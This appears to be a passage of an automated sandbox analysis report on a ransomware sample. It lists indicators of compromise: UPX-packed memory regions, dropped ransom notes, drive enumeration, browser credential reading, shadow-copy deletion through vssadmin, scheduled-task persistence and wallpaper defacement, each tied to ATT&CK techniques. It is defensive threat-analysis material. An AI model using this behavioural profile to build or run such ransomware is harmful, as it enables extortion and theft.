2452	takeown.exe
2740	Process not Found
7120	Process not Found
4472	Process not Found
5588	takeown.exe
6100	takeown.exe
5192	takeown.exe
6092	takeown.exe
4152	Process not Found
6852	Process not Found
7136	takeown.exe
5816	Process not Found
6336	takeown.exe
5944	takeown.exe
6912	Process not Found
888	Process not Found
7020	takeown.exe
6552	takeown.exe
2896	takeown.exe
4944	Process not Found
5584	takeown.exe
5552	Process not Found
5660	Process not Found
1204	Process not Found
2200	Process not Found
5248	Process not Found
1668	Process not Found
3780	takeown.exe
6968	takeown.exe
5284	takeown.exe
6620	takeown.exe
6652	Process not Found
1388	Process not Found
5548	Process not Found
6308	Process not Found
752	Process not Found
6096	takeown.exe
5612	takeown.exe
1596	takeown.exe
1012	takeown.exe
5944	Process not Found
3500	Process not Found
5660	takeown.exe
3728	takeown.exe
3660	Process not Found
1504	takeown.exe
4472	takeown.exe
7044	takeown.exe
4616	takeown.exe
3336	takeown.exe
7072	takeown.exe
6932	takeown.exe
1312	takeown.exe
5680	Process not Found
1488	Process not Found
3500	Process not Found
6312	Process not Found
6692	takeown.exe
3952	takeown.exe
6764	takeown.exe
6564	Process not Found
5316	takeown.exe
4492	Process not Found
5184	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral12/memory/7016-5206-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/files/0x000700000002322b-5205.dat	upx
behavioral12/memory/5408-6777-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4696-6779-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/60-6783-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/60-6784-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5472-6786-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5472-6787-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6388-6790-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6696-6792-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6696-6793-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5996-6795-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5996-6796-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6168-6798-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5412-6802-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7016-6801-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6028-6805-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5696-6809-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5592-6811-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4204-6813-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/1020-6815-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4760-6817-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6272-6819-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4276-6823-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5652-6825-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3036-6827-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6636-6831-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5448-6833-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/2012-6835-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6240-6837-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6616-6839-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6340-6841-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4052-6843-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4052-6844-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6644-6846-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6516-6848-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6480-6850-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7112-6852-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5816-6856-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5708-6858-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5144-6860-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5224-6862-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5224-6863-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6696-6865-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5348-6867-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6308-6871-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6484-6869-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/7164-6873-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3660-6875-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3660-6876-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5696-6878-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5612-6880-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6188-6885-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5516-6887-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4760-6891-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6272-6893-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4760-6890-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/3728-6896-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6708-6898-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6440-6901-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6452-6904-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/6452-6903-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/4244-6912-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral12/memory/5448-6914-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	3xoBcHMg64.exe
File opened (read-only)	\??\M:	3xoBcHMg64.exe
File opened (read-only)	\??\Y:	3xoBcHMg64.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\X:	3xoBcHMg64.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\U:	3xoBcHMg64.exe
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	3xoBcHMg64.exe
File opened (read-only)	\??\G:	3xoBcHMg64.exe
File opened (read-only)	\??\N:	3xoBcHMg64.exe
File opened (read-only)	\??\P:	3xoBcHMg64.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\T:	3xoBcHMg64.exe
File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\S:	3xoBcHMg64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	3xoBcHMg64.exe
File opened (read-only)	\??\L:	3xoBcHMg64.exe
File opened (read-only)	\??\Q:	3xoBcHMg64.exe
File opened (read-only)	\??\R:	3xoBcHMg64.exe
File opened (read-only)	\??\V:	3xoBcHMg64.exe
File opened (read-only)	\??\Z:	3xoBcHMg64.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\B:	3xoBcHMg64.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\J:	3xoBcHMg64.exe
File opened (read-only)	\??\K:	3xoBcHMg64.exe
File opened (read-only)	\??\O:	3xoBcHMg64.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\W:	3xoBcHMg64.exe
File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	3xoBcHMg64.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
145	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\7dQr4YE9.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\mesa3d.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\New_Skins.url	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fil.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\javafx\libxslt.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Other.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\v8_context_snapshot.bin.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklist	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gl.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\management\management.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\id.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11wrapper.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\icu.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\InitializeDismount.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\unicode.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.VisualElementsManifest.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\removed-files	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre-1.8\lib\ext\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Analytics	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Content.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre-1.8\legal\javafx\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\MeasureJoin.dwfx	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Other	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightRegular.ttf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\preloaded_data.pb.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\ResetConvert.dot	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_HK.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\fontconfig.bfc	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\javafx\mesa3d.md	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\psfont.properties.ja	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.access	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\cmm\GRAY.pf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\notification_helper.exe.manifest	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es-419.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5932	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
6992	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1604	powershell.exe
1604	powershell.exe
1604	powershell.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe
4332	3xoBcHMg64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
4332	3xoBcHMg64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeTakeOwnershipPrivilege	4944	takeown.exe
Token: SeDebugPrivilege	4332	3xoBcHMg64.exe
Token: SeLoadDriverPrivilege	4332	3xoBcHMg64.exe
Token: SeBackupPrivilege	6128	vssvc.exe
Token: SeRestorePrivilege	6128	vssvc.exe
Token: SeAuditPrivilege	6128	vssvc.exe
Token: SeIncreaseQuotaPrivilege	6260	WMIC.exe
Token: SeSecurityPrivilege	6260	WMIC.exe
Token: SeTakeOwnershipPrivilege	6260	WMIC.exe
Token: SeLoadDriverPrivilege	6260	WMIC.exe
Token: SeSystemProfilePrivilege	6260	WMIC.exe
Token: SeSystemtimePrivilege	6260	WMIC.exe
Token: SeProfSingleProcessPrivilege	6260	WMIC.exe
Token: SeIncBasePriorityPrivilege	6260	WMIC.exe
